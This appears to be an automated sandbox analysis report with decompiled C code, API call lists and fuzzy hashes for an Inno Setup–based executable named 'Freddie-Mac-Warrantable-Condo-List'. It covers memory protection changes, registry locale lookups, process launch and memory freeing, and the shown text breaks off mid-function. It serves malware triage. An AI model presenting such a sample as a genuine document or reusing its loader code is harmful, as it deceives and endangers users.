Similarity

API ID: AddressProc$ErrorHandleLibraryLoadModeModulePolicyProcessVersion
String ID: SetDefaultDllDirectories$SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$apphelp.dll$clbcatq.dll$comres.dll$cryptbase.dll$dwmapi.dll$hK$hK$kernel32.dll$ntmarta.dll$oleacc.dll$profapi.dll$propsys.dll$setupapi.dll$userenv.dll$uxtheme.dll$version.dll
API String ID: 2248137261-3182217745
Opcode ID: 68b2adb77f8f7151d30e1a894141e6e7486eaa9f98baa6450b00b79ea83e97ab
Instruction ID: 14362f36823de93a6bafc63c1bb5288ecf7b8ac372eee3bc1917329a49ba756d
Opcode Fuzzy Hash: 68b2adb77f8f7151d30e1a894141e6e7486eaa9f98baa6450b00b79ea83e97ab
Instruction Fuzzy Hash: 57513C34601504ABE701EBA6DC82FDEB3A5AB94348BA4493BE40077395DF7C9D428B6D

Uniqueness

Uniqueness Score: -1.00%

Function 004AF91C, Relevance: 7.6, APIs: 5, Instructions: 80
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004AF91C(void* __eax) {
				char _v44;
				struct _SYSTEM_INFO _v80;
				long _v84;
				char _v88;
				long _t22;
				int _t28;
				void* _t37;
				struct _MEMORY_BASIC_INFORMATION* _t40;
				long _t41;
				void** _t42;

				_t42 =  &(_v80.dwPageSize);
				 *_t42 = __eax;
				_t40 =  &_v44;
				GetSystemInfo( &_v80); // executed
				_t22 = VirtualQuery( *_t42, _t40, 0x1c);
				if(_t22 == 0) {
					L17:
					return _t22;
				} else {
					while(1) {
						_t22 = _t40->AllocationBase;
						if(_t22 !=  *_t42) {
							goto L17;
						}
						if(_t40->State != 0x1000 || (_t40->Protect & 0x00000001) != 0) {
							L15:
							_t22 = VirtualQuery(_t40->BaseAddress + _t40->RegionSize, _t40, 0x1c);
							if(_t22 == 0) {
								goto L17;
							}
							continue;
						} else {
							_v88 = 0;
							_t41 = _t40->Protect;
							if(_t41 == 1 || _t41 == 2 || _t41 == 0x10 || _t41 == 0x20) {
								_t28 = VirtualProtect(_t40->BaseAddress, _t40->RegionSize, 0x40,  &_v84); // executed
								if(_t28 != 0) {
									_v88 = 1;
								}
							}
							_t37 = 0;
							while(_t37 < _t40->RegionSize) {
								E004AF914(_t40->BaseAddress + _t37);
								_t37 = _t37 + _v80.dwPageSize;
							}
							if(_v88 != 0) {
								VirtualProtect( *_t40, _t40->RegionSize, _v84,  &_v84); // executed
							}
							goto L15;
						}
					}
					goto L17;
				}
			}

0x004af920
0x004af923
0x004af926
0x004af92f
0x004af93b
0x004af942
0x004af9ee
0x004af9ee
0x004af948
0x004af9db
0x004af9db
0x004af9e1
0x00000000
0x00000000
0x004af954
0x004af9c7
0x004af9d2
0x004af9d9
0x00000000
0x00000000
0x00000000
0x004af95c
0x004af95c
0x004af961
0x004af967
0x004af986
0x004af98d
0x004af98f
0x004af98f
0x004af98d
0x004af994
0x004af9a5
0x004af99c
0x004af9a1
0x004af9a1
0x004af9af
0x004af9c2
0x004af9c2
0x00000000
0x004af9af
0x004af954
0x00000000
0x004af9db

APIs

GetSystemInfo.KERNEL32(?), ref: 004AF92F
VirtualQuery.KERNEL32(?,?,0000001C,?), ref: 004AF93B
VirtualProtect.KERNEL32(?,?,00000040,0000001C,?,?,0000001C), ref: 004AF986
VirtualProtect.KERNEL32(?,?,?,0000001C,?,?,00000040,0000001C,?,?,0000001C), ref: 004AF9C2
VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C,?), ref: 004AF9D2

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Virtual$ProtectQuery$InfoSystem
String ID:
API String ID: 2441996862-0
Opcode ID: 57281b4e736338f8d77ca256b537dd22dd4c981be38144bf210ac0f1d0b120f5
Instruction ID: 3a96586125c0dafbea7f6284d897bb751f900199eded140d0d018ead0d29608e
Opcode Fuzzy Hash: 57281b4e736338f8d77ca256b537dd22dd4c981be38144bf210ac0f1d0b120f5
Instruction Fuzzy Hash: C5212CB1104344BAD730DA99C885F6BBBEC9B56354F04492EF59583681D339E848C766

Uniqueness

Uniqueness Score: -1.00%

Function 0040B044, Relevance: 3.1, APIs: 2, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040B044(char __eax, void* __ebx, intOrPtr* __edx, void* __eflags) {
				char _v8;
				short _v12;
				void* _v16;
				char _v20;
				char _v24;
				void* _t29;
				void* _t40;
				intOrPtr* _t44;
				intOrPtr _t55;
				void* _t61;

				_push(__ebx);
				_v24 = 0;
				_v20 = 0;
				_t44 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t61);
				_push(0x40b104);
				_push( *[fs:eax]);
				 *[fs:eax] = _t61 + 0xffffffec;
				_t21 =  &_v16;
				L00403730();
				GetLocaleInfoW( &_v16 & 0x0000ffff, 3, _t21, 4);
				E0040858C( &_v20, 4,  &_v16);
				E0040873C(_t44, _v20, _v8);
				_t29 = E0040AEF4( *_t44, _t44); // executed
				if(_t29 == 0) {
					_v12 = 0;
					E0040858C( &_v24, 4,  &_v16);
					E0040873C(_t44, _v24, _v8);
					_t40 = E0040AEF4( *_t44, _t44); // executed
					if(_t40 == 0) {
						E00407A20(_t44);
					}
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(E0040B10B);
				E00407A80( &_v24, 2);
				return E00407A20( &_v8);
			}

0x0040b04a
0x0040b04d
0x0040b050
0x0040b053
0x0040b055
0x0040b05b
0x0040b062
0x0040b063
0x0040b068
0x0040b06b
0x0040b070
0x0040b076
0x0040b07f
0x0040b08f
0x0040b09c
0x0040b0a3
0x0040b0aa
0x0040b0ac
0x0040b0bd
0x0040b0ca
0x0040b0d1
0x0040b0d8
0x0040b0dc
0x0040b0dc
0x0040b0d8
0x0040b0e3
0x0040b0e6
0x0040b0e9
0x0040b0f6
0x0040b103

APIs

GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040B104,?,?), ref: 0040B076
GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040B104,?,?), ref: 0040B07F

Part of subcall function 0040AEF4: FindFirstFileW.KERNEL32(00000000,?,00000000,0040AF52,?,?), ref: 0040AF27
Part of subcall function 0040AEF4: FindClose.KERNEL32(00000000,00000000,?,00000000,0040AF52,?,?), ref: 0040AF37

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
String ID:
API String ID: 3216391948-0
Opcode ID: 044937d21d1936a91ef9b6e1a310017a9e27582e27e23f6d989339badd03c388
Instruction ID: a9cfc37755e84068b6e5d0711ea0537dd567252b91127d2e7da10f621904fc04
Opcode Fuzzy Hash: 044937d21d1936a91ef9b6e1a310017a9e27582e27e23f6d989339badd03c388
Instruction Fuzzy Hash: 35113674A041099BDB00EB95C9529AEB3B9EF44304F50447FA515B73C1DB785E058A6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040AEF4, Relevance: 3.0, APIs: 2, Instructions: 33
fileCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0040AEF4(char __eax, signed int __ebx) {
				char _v8;
				struct _WIN32_FIND_DATAW _v600;
				void* _t15;
				intOrPtr _t24;
				void* _t27;

				_push(__ebx);
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t27);
				_push(0x40af52);
				_push( *[fs:eax]);
				 *[fs:eax] = _t27 + 0xfffffdac;
				_t15 = FindFirstFileW(E004084EC(_v8),  &_v600); // executed
				if((__ebx & 0xffffff00 | _t15 != 0xffffffff) != 0) {
					FindClose(_t15);
				}
				_pop(_t24);
				 *[fs:eax] = _t24;
				_push(E0040AF59);
				return E00407A20( &_v8);
			}

0x0040aefd
0x0040aefe
0x0040af04
0x0040af0b
0x0040af0c
0x0040af11
0x0040af14
0x0040af27
0x0040af34
0x0040af37
0x0040af37
0x0040af3e
0x0040af41
0x0040af44
0x0040af51

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,0040AF52,?,?), ref: 0040AF27
FindClose.KERNEL32(00000000,00000000,?,00000000,0040AF52,?,?), ref: 0040AF37

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: bba38ffe097e2c5d51b68bca4dd41d34791c3125f335f0c7ddbac3aaaf9dd96f
Instruction ID: b27eefbf95a445daf5872925c41aeb1c7ded3ce7930a436f9b8cfd192dc84724
Opcode Fuzzy Hash: bba38ffe097e2c5d51b68bca4dd41d34791c3125f335f0c7ddbac3aaaf9dd96f
Instruction Fuzzy Hash: 5FF0B471518209BFC710FB75CD4294EB7ACEB043147A005B6B504F32C1E638AF149519

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB18, Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E0040AB18(char __eax, void* __ebx, void* __ecx, void* __edx) {
				char _v8;
				char* _v12;
				void* _v16;
				int _v20;
				short _v542;
				long _t51;
				long _t85;
				long _t87;
				long _t89;
				long _t91;
				long _t93;
				void* _t97;
				intOrPtr _t106;
				intOrPtr _t108;
				void* _t112;
				void* _t113;
				intOrPtr _t114;

				_t112 = _t113;
				_t114 = _t113 + 0xfffffde4;
				_t97 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t112);
				_push(0x40ad3d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t114;
				if(_v8 != 0) {
					E0040A34C( &_v542, E004084EC(_v8), 0x105);
				} else {
					GetModuleFileNameW(0,  &_v542, 0x105);
				}
				if(_v542 == 0) {
					L18:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(E0040AD44);
					return E00407A20( &_v8);
				} else {
					_v12 = 0;
					_t51 = RegOpenKeyExW(0x80000001, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
					if(_t51 == 0) {
						L10:
						_push(_t112);
						_push(0x40ad20);
						_push( *[fs:eax]);
						 *[fs:eax] = _t114;
						E0040A928( &_v542, 0x105);
						if(RegQueryValueExW(_v16,  &_v542, 0, 0, 0,  &_v20) != 0) {
							if(RegQueryValueExW(_v16, E0040AE30, 0, 0, 0,  &_v20) == 0) {
								_v12 = E004053F0(_v20);
								RegQueryValueExW(_v16, E0040AE30, 0, 0, _v12,  &_v20);
								E00408550(_t97, _v12);
							}
						} else {
							_v12 = E004053F0(_v20);
							RegQueryValueExW(_v16,  &_v542, 0, 0, _v12,  &_v20);
							E00408550(_t97, _v12);
						}
						_pop(_t108);
						 *[fs:eax] = _t108;
						_push(E0040AD27);
						if(_v12 != 0) {
							E0040540C(_v12);
						}
						return RegCloseKey(_v16);
					} else {
						_t85 = RegOpenKeyExW(0x80000002, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
						if(_t85 == 0) {
							goto L10;
						} else {
							_t87 = RegOpenKeyExW(0x80000001, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
							if(_t87 == 0) {
								goto L10;
							} else {
								_t89 = RegOpenKeyExW(0x80000002, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
								if(_t89 == 0) {
									goto L10;
								} else {
									_t91 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Locales", 0, 0xf0019,  &_v16); // executed
									if(_t91 == 0) {
										goto L10;
									} else {
										_t93 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v16); // executed
										if(_t93 != 0) {
											goto L18;
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				}
			}

0x0040ab19
0x0040ab1b
0x0040ab22
0x0040ab24
0x0040ab2a
0x0040ab31
0x0040ab32
0x0040ab37
0x0040ab3a
0x0040ab41
0x0040ab6d
0x0040ab43
0x0040ab51
0x0040ab51
0x0040ab7a
0x0040ad27
0x0040ad29
0x0040ad2c
0x0040ad2f
0x0040ad3c
0x0040ab80
0x0040ab82
0x0040ab9a
0x0040aba1
0x0040ac41
0x0040ac43
0x0040ac44
0x0040ac49
0x0040ac4c
0x0040ac5a
0x0040ac7b
0x0040acca
0x0040acd4
0x0040acec
0x0040acf6
0x0040acf6
0x0040ac7d
0x0040ac85
0x0040ac9f
0x0040aca9
0x0040aca9
0x0040acfd
0x0040ad00
0x0040ad03
0x0040ad0c
0x0040ad11
0x0040ad11
0x0040ad1f
0x0040aba7
0x0040abbc
0x0040abc3
0x00000000
0x0040abc5
0x0040abda
0x0040abe1
0x00000000
0x0040abe3
0x0040abf8
0x0040abff
0x00000000
0x0040ac01
0x0040ac16
0x0040ac1d
0x00000000
0x0040ac1f
0x0040ac34
0x0040ac3b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ac3b
0x0040ac1d
0x0040abff
0x0040abe1
0x0040abc3
0x0040aba1

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040AD3D,?,?), ref: 0040AB51
RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D,?,?), ref: 0040AB9A
RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D,?,?), ref: 0040ABBC
RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040ABDA
RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040ABF8
RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040AC16
RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040AC34
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D), ref: 0040AC74
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001), ref: 0040AC9F
RegCloseKey.ADVAPI32(?,0040AD27,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001,Software\Embarcadero\Locales), ref: 0040AD1A

Strings

Software\CodeGear\Locales, xrefs: 0040ABD0, 0040ABEE
Software\Embarcadero\Locales, xrefs: 0040AB90, 0040ABB2
Software\Borland\Locales, xrefs: 0040AC0C
Software\Borland\Delphi\Locales, xrefs: 0040AC2A

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Open$QueryValue$CloseFileModuleName
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
API String ID: 2701450724-3496071916
Opcode ID: 8af598c5208afc10239ec938650b713086258bd8f52ea94da89803fd33d180c8
Instruction ID: cdbeddac4db4dda9279672c2614f8dce2a18b15a4a55f9a64fe791b6da82c449
Opcode Fuzzy Hash: 8af598c5208afc10239ec938650b713086258bd8f52ea94da89803fd33d180c8
Instruction Fuzzy Hash: FB514371A80308BEEB10DA95CC46FAE77BCEB08709F504477BA04F75C1D6B8AA50975E

Uniqueness

Uniqueness Score: -1.00%

Function 004B63A1, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E004B63A1(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t17;
				struct HWND__* _t21;
				struct HWND__* _t22;
				struct HWND__* _t25;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t36;
				intOrPtr _t39;
				int _t40;
				intOrPtr _t41;
				intOrPtr _t43;
				struct HWND__* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				void* _t73;
				void* _t74;

				_t74 = __eflags;
				_t72 = __esi;
				_t71 = __edi;
				_t52 = __ebx;
				_pop(_t62);
				 *[fs:eax] = _t62;
				_t17 =  *0x4c1d88; // 0x0
				 *0x4c1d88 = 0;
				E00405CE8(_t17);
				_t21 = E0040E450(0, L"STATIC", 0,  *0x4be634, 0, 0, 0, 0, 0, 0, 0); // executed
				 *0x4ba450 = _t21;
				_t22 =  *0x4ba450; // 0x90236
				 *0x4c1d80 = SetWindowLongW(_t22, 0xfffffffc, E004AF69C);
				_t25 =  *0x4ba450; // 0x90236
				 *(_t73 - 0x58) = _t25;
				 *((char*)(_t73 - 0x54)) = 0;
				_t26 =  *0x4c1d90; // 0x4d582c
				_t4 = _t26 + 0x20; // 0x61e129d
				 *((intOrPtr*)(_t73 - 0x50)) =  *_t4;
				 *((char*)(_t73 - 0x4c)) = 0;
				_t28 =  *0x4c1d90; // 0x4d582c
				_t7 = _t28 + 0x24; // 0xc9800
				 *((intOrPtr*)(_t73 - 0x48)) =  *_t7;
				 *((char*)(_t73 - 0x44)) = 0;
				E0041A87C(L"/SL5=\"$%x,%d,%d,", 2, _t73 - 0x58, _t73 - 0x40);
				_push( *((intOrPtr*)(_t73 - 0x40)));
				_push( *0x4c1d84);
				_push(0x4b6680);
				E00422BC4(_t73 - 0x5c, __ebx, __esi, _t74);
				_push( *((intOrPtr*)(_t73 - 0x5c)));
				E004087C4(_t73 - 0x3c, __ebx, 4, __edi, __esi);
				_t36 =  *0x4c1d9c; // 0x0, executed
				E004AF728(_t36, _t52, 0x4ba44c,  *((intOrPtr*)(_t73 - 0x3c)), _t71, _t72, __fp0); // executed
				if( *0x4ba448 != 0xffffffff) {
					_t50 =  *0x4ba448; // 0x0
					E004AF60C(_t50);
				}
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E004B6554);
				_t39 =  *0x4c1d88; // 0x0
				_t40 = E00405CE8(_t39);
				if( *0x4c1d9c != 0) {
					_t70 =  *0x4c1d9c; // 0x0
					_t40 = E004AF1B4(0, _t70, 0xfa, 0x32); // executed
				}
				if( *0x4c1d94 != 0) {
					_t47 =  *0x4c1d94; // 0x0
					_t40 = RemoveDirectoryW(E004084EC(_t47)); // executed
				}
				if( *0x4ba450 != 0) {
					_t46 =  *0x4ba450; // 0x90236
					_t40 = DestroyWindow(_t46); // executed
				}
				if( *0x4c1d78 != 0) {
					_t41 =  *0x4c1d78; // 0x0
					_t60 =  *0x4c1d7c; // 0x1
					_t69 =  *0x426bb0; // 0x426bb4
					E00408D08(_t41, _t60, _t69);
					_t43 =  *0x4c1d78; // 0x0
					E0040540C(_t43);
					 *0x4c1d78 = 0;
					return 0;
				}
				return _t40;
			}

0x004b63a1
0x004b63a1
0x004b63a1
0x004b63a1
0x004b63a3
0x004b63a6
0x004b63d3
0x004b63da
0x004b63e0
0x004b6407
0x004b640c
0x004b6418
0x004b6423
0x004b642c
0x004b6431
0x004b6434
0x004b6438
0x004b643d
0x004b6440
0x004b6443
0x004b6447
0x004b644c
0x004b644f
0x004b6452
0x004b6463
0x004b6468
0x004b646b
0x004b6471
0x004b6479
0x004b647e
0x004b6489
0x004b6496
0x004b649b
0x004b64a7
0x004b64a9
0x004b64ae
0x004b64ae
0x004b64b5
0x004b64b8
0x004b64bb
0x004b64c0
0x004b64c5
0x004b64d1
0x004b64df
0x004b64e7
0x004b64e7
0x004b64f3
0x004b64f5
0x004b6500
0x004b6500
0x004b650c
0x004b650e
0x004b6514
0x004b6514
0x004b6520
0x004b6522
0x004b6527
0x004b652d
0x004b6533
0x004b6538
0x004b653d
0x004b6544
0x00000000
0x004b6544
0x004b6549

APIs

Part of subcall function 0040E450: CreateWindowExW.USER32 ref: 0040E48F

SetWindowLongW.USER32 ref: 004B641E

Part of subcall function 00422BC4: GetCommandLineW.KERNEL32(00000000,00422C06,?,?,00000000,?,004B647E,004B6680,?), ref: 00422BDA

Part of subcall function 004AF728: CreateProcessW.KERNEL32 ref: 004AF798
Part of subcall function 004AF728: CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004AF82C,00000000,004AF81C,00000000), ref: 004AF7AE
Part of subcall function 004AF728: MsgWaitForMultipleObjects.USER32 ref: 004AF7C7
Part of subcall function 004AF728: GetExitCodeProcess.KERNEL32 ref: 004AF7DB
Part of subcall function 004AF728: CloseHandle.KERNEL32(?,?,004BA44C,00000001,?,00000000,000000FF,000004FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AF7E4

RemoveDirectoryW.KERNEL32(00000000,004B6554), ref: 004B6500
DestroyWindow.USER32(00090236,004B6554), ref: 004B6514

Strings

,XM, xrefs: 004B6438, 004B6447
InnoSetupLdrWindow, xrefs: 004B63FB
/SL5="$%x,%d,%d,, xrefs: 004B645E
STATIC, xrefs: 004B6400

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
String ID: ,XM$/SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
API String ID: 3586484885-3367169067
Opcode ID: 3c021837c984efc67f9ad3a794955b0d04b23bc85077f6812c73bb0a86195aee
Instruction ID: 04c90e22d0408fd8de4b79ff2beaee59f7a3a861a1d73b16261182ae62401715
Opcode Fuzzy Hash: 3c021837c984efc67f9ad3a794955b0d04b23bc85077f6812c73bb0a86195aee
Instruction Fuzzy Hash: EC416B74A002009FE754EBA9EC85B9A37B4EB85308F11453BE0059B2B6CB7CA851CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040426C, Relevance: 12.2, APIs: 8, Instructions: 221
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E0040426C(void* __eax, signed int __edi, void* __ebp) {
				struct _MEMORY_BASIC_INFORMATION _v44;
				void* _v48;
				signed int __ebx;
				void* _t58;
				signed int _t61;
				int _t65;
				signed int _t67;
				void _t70;
				int _t71;
				signed int _t78;
				void* _t79;
				signed int _t81;
				intOrPtr _t82;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				signed int _t92;
				void* _t96;
				signed int _t99;
				void* _t103;
				intOrPtr _t104;
				void* _t106;
				void* _t108;
				signed int _t113;
				void* _t115;
				void* _t116;

				_t56 = __eax;
				_t89 =  *(__eax - 4);
				_t78 =  *0x4bb059; // 0x0
				if((_t89 & 0x00000007) != 0) {
					__eflags = _t89 & 0x00000005;
					if((_t89 & 0x00000005) != 0) {
						_pop(_t78);
						__eflags = _t89 & 0x00000003;
						if((_t89 & 0x00000003) == 0) {
							_push(_t78);
							_push(__edi);
							_t116 = _t115 + 0xffffffdc;
							_t103 = __eax - 0x10;
							E00403C48();
							_t58 = _t103;
							 *_t116 =  *_t58;
							_v48 =  *((intOrPtr*)(_t58 + 4));
							_t92 =  *(_t58 + 0xc);
							if((_t92 & 0x00000008) != 0) {
								_t79 = _t103;
								_t113 = _t92 & 0xfffffff0;
								_t99 = 0;
								__eflags = 0;
								while(1) {
									VirtualQuery(_t79,  &_v44, 0x1c);
									_t61 = VirtualFree(_t79, 0, 0x8000);
									__eflags = _t61;
									if(_t61 == 0) {
										_t99 = _t99 | 0xffffffff;
										goto L10;
									}
									_t104 = _v44.RegionSize;
									__eflags = _t113 - _t104;
									if(_t113 > _t104) {
										_t113 = _t113 - _t104;
										_t79 = _t79 + _t104;
										continue;
									}
									goto L10;
								}
							} else {
								_t65 = VirtualFree(_t103, 0, 0x8000); // executed
								if(_t65 == 0) {
									_t99 = __edi | 0xffffffff;
								} else {
									_t99 = 0;
								}
							}
							L10:
							if(_t99 == 0) {
								 *_v48 =  *_t116;
								 *( *_t116 + 4) = _v48;
							}
							 *0x4bdb78 = 0;
							return _t99;
						} else {
							return 0xffffffff;
						}
					} else {
						goto L31;
					}
				} else {
					__eflags = __bl;
					__ebx =  *__edx;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L14;
							}
							asm("pause");
							__eflags =  *0x4bb989;
							if(__eflags != 0) {
								continue;
							} else {
								Sleep(0);
								__edx = __edx;
								__ecx = __ecx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									__edx = __edx;
									__ecx = __ecx;
									continue;
								}
							}
							goto L14;
						}
					}
					L14:
					_t14 = __edx + 0x14;
					 *_t14 =  *(__edx + 0x14) - 1;
					__eflags =  *_t14;
					__eax =  *(__edx + 0x10);
					if( *_t14 == 0) {
						__eflags = __eax;
						if(__eax == 0) {
							L20:
							 *(__ebx + 0x14) = __eax;
						} else {
							__eax =  *(__edx + 0xc);
							__ecx =  *(__edx + 8);
							 *(__eax + 8) = __ecx;
							 *(__ecx + 0xc) = __eax;
							__eax = 0;
							__eflags =  *((intOrPtr*)(__ebx + 0x18)) - __edx;
							if( *((intOrPtr*)(__ebx + 0x18)) == __edx) {
								goto L20;
							}
						}
						 *__ebx = __al;
						__eax = __edx;
						__edx =  *(__edx - 4);
						__bl =  *0x4bb059; // 0x0
						L31:
						__eflags = _t78;
						_t81 = _t89 & 0xfffffff0;
						_push(_t101);
						_t106 = _t56;
						if(__eflags != 0) {
							while(1) {
								_t67 = 0x100;
								asm("lock cmpxchg [0x4bbae8], ah");
								if(__eflags == 0) {
									goto L32;
								}
								asm("pause");
								__eflags =  *0x4bb989;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									_t67 = 0x100;
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L32;
							}
						}
						L32:
						__eflags = (_t106 - 4)[_t81] & 0x00000001;
						_t87 = (_t106 - 4)[_t81];
						if(((_t106 - 4)[_t81] & 0x00000001) != 0) {
							_t67 = _t81 + _t106;
							_t88 = _t87 & 0xfffffff0;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E00403AC0(_t67);
							}
						} else {
							_t88 = _t87 | 0x00000008;
							__eflags = _t88;
